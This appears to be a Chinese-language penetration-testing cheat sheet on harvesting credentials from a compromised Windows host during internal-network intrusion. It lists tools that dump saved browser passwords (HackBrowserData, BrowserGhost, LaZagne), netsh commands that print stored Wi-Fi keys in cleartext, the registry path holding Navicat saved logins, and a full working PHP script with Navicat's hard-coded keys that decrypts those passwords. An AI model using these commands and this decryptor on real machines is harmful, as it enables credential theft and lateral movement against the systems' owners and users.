一、浏览器密码获取

获取浏览器密码在内网渗透中的单机信息收集中是比较重要的一环,可能从浏览器中默认保存的密码中获取信息,可能这些密码是通用的,往往可以打开一个突破口,这部分主要利用工具。

HackBrowserData

https://github.com/moonD4rk/HackBrowserData
双击运行
image.png
image.png

BrowserGhost

https://github.com/QAX-A-Team/BrowserGhost/releases
需要时间运行
下载完releases版本后直接使用即可
image.png

LaZagne获取主机所有的密码

http://www.secwk.com/2019/10/15/10808/
λ laZagne_x64.exe all 非常简单的使用方式
image.png

360浏览器密码获取

360SafeBrowsergetpass

二、无线密码获取

Netsh wlan show profiles 查看当前系统保存的无线
image.png
Netsh wlan show profile name=xxxx key=clear 查看明文信息
image.png

三、NAVICAT密码获取

打开注册表
HKEY_CURRENT_USER\Software\PremiumSoft\Navicat\Servers\101.132.26.xxx
在此目录下会存放着navicat里的主机username 和 password
image.png

再将此密码放入此脚本中进行解密

  1. <?php
  2. class NavicatPassword
  3. {
  4.     protected $version = 0;
  5.     protected $aesKey = 'libcckeylibcckey';
  6.     protected $aesIv = 'libcciv libcciv ';
  7.     protected $blowString = '3DC5CA39';
  8.     protected $blowKey = null;
  9.     protected $blowIv = null;
  11.     public function __construct($version = 12)
  12.     {
  13.         $this->version = $version;
  14.         $this->blowKey = sha1('3DC5CA39', true);
  15.         $this->blowIv = hex2bin('d9c7c3c8870d64bd');
  16.     }
  18.     public function encrypt($string)
  19.     {
  20.         $result = FALSE;
  21.         switch ($this->version) {
  22.             case 11:
  23.                 $result = $this->encryptEleven($string);
  24.                 break;
  25.             case 12:
  26.                 $result = $this->encryptTwelve($string);
  27.                 break;
  28.             default:
  29.                 break;
  30.         }
  32.         return $result;
  33.     }
  35.     protected function encryptEleven($string)
  36.     {
  37.         $round = intval(floor(strlen($string) / 8));
  38.         $leftLength = strlen($string) % 8;
  39.         $result = '';
  40.         $currentVector = $this->blowIv;
  42.         for ($i = 0; $i < $round; $i++) {
  43.             $temp = $this->encryptBlock($this->xorBytes(substr($string, 8 * $i, 8), $currentVector));
  44.             $currentVector = $this->xorBytes($currentVector, $temp);
  45.             $result .= $temp;
  46.         }
  48.         if ($leftLength) {
  49.             $currentVector = $this->encryptBlock($currentVector);
  50.             $result .= $this->xorBytes(substr($string, 8 * $i, $leftLength), $currentVector);
  51.         }
  53.         return strtoupper(bin2hex($result));
  54.     }
  56.     protected function encryptBlock($block)
  57.     {
  58.         return openssl_encrypt($block, 'BF-ECB', $this->blowKey, OPENSSL_RAW_DATA|OPENSSL_NO_PADDING);
  59.     }
  61.     protected function decryptBlock($block)
  62.     {
  63.         return openssl_decrypt($block, 'BF-ECB', $this->blowKey, OPENSSL_RAW_DATA|OPENSSL_NO_PADDING);
  64.     }
  66.     protected function xorBytes($str1, $str2)
  67.     {
  68.         $result = '';
  69.         for ($i = 0; $i < strlen($str1); $i++) {
  70.             $result .= chr(ord($str1[$i]) ^ ord($str2[$i]));
  71.         }
  73.         return $result;
  74.     }
  76.     protected function encryptTwelve($string)
  77.     {
  78.         $result = openssl_encrypt($string, 'AES-128-CBC', $this->aesKey, OPENSSL_RAW_DATA, $this->aesIv);
  79.         return strtoupper(bin2hex($result));
  80.     }
  82.     public function decrypt($string)
  83.     {
  84.         $result = FALSE;
  85.         switch ($this->version) {
  86.             case 11:
  87.                 $result = $this->decryptEleven($string);
  88.                 break;
  89.             case 12:
  90.                 $result = $this->decryptTwelve($string);
  91.                 break;
  92.             default:
  93.                 break;
  94.         }
  96.         return $result;
  97.     }
  99.     protected function decryptEleven($upperString)
  100.     {
  101.         $string = hex2bin(strtolower($upperString));
  103.         $round = intval(floor(strlen($string) / 8));
  104.         $leftLength = strlen($string) % 8;
  105.         $result = '';
  106.         $currentVector = $this->blowIv;
  108.         for ($i = 0; $i < $round; $i++) {
  109.             $encryptedBlock = substr($string, 8 * $i, 8);
  110.             $temp = $this->xorBytes($this->decryptBlock($encryptedBlock), $currentVector);
  111.             $currentVector = $this->xorBytes($currentVector, $encryptedBlock);
  112.             $result .= $temp;
  113.         }
  115.         if ($leftLength) {
  116.             $currentVector = $this->encryptBlock($currentVector);
  117.             $result .= $this->xorBytes(substr($string, 8 * $i, $leftLength), $currentVector);
  118.         }
  120.         return $result;
  121.     }
  123.     protected function decryptTwelve($upperString)
  124.     {
  125.         $string = hex2bin(strtolower($upperString));
  126.         return openssl_decrypt($string, 'AES-128-CBC', $this->aesKey, OPENSSL_RAW_DATA, $this->aesIv);
  127.     }
  128. };
  131. //需要指定版本两种,11或12
  132. //$navicatPassword = new NavicatPassword(11);
  133. $navicatPassword = new NavicatPassword(11);
  135. //解密 https://tool.lu/coderunner
  136. //$decode = $navicatPassword->decrypt('5658213B');
  137. $decode = $navicatPassword->decrypt('B43AAE7AE7D80102A4C2EB');
  138. echo $decode."\n";
  139. ?>

https://tool.lu/coderunner 即可获取争取的数据明文密码
image.png